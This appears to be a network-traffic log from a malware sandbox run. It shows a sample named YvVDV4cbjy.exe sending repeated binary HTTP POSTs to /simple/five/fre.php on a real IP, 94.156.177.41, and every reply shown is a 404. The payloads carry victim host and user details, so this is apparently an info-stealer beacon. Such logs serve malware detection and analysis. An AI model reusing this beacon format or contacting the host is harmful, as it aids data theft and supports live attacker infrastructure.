Jan 11, 2025 07:44:29.091341972 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:29.096261024 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:29.967045069 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49714	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:30.125305891 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:30.130805016 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:30.851399899 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49715	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:31.008527040 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:31.013402939 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:31.718381882 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49716	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:32.789330959 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:32.794115067 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:33.640239954 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49717	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:33.794528961 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:33.799410105 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:34.512341976 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49718	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:34.666192055 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:34.671201944 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:35.395987034 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49719	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:35.538367987 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:35.543287992 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:36.266621113 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49720	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:36.435060024 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:36.441283941 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:37.189220905 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49721	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:37.561945915 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:37.566874981 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:38.297092915 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49722	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:38.449610949 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:38.454562902 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:39.175416946 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49724	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:39.340305090 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:39.345172882 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:40.082995892 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49725	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:40.452266932 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:40.457077980 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:41.166259050 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49730	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:41.326829910 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:41.331671000 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:42.037022114 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49738	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:42.248599052 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:42.253637075 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:42.933898926 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49743	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:43.093704939 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:43.098512888 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:43.818480968 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49749	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:43.975105047 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:43.980050087 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:44.687083006 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49755	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:44.847551107 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:44.852549076 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:45.559175014 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49761	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:45.723443031 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:45.728632927 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:46.454267979 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49771	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:46.606229067 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:46.611946106 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:47.314904928 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49777	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:47.465435028 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:47.470300913 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:48.185899973 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49784	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:48.338815928 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:48.343699932 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:49.200258970 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49790	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:49.354667902 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:49.359566927 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
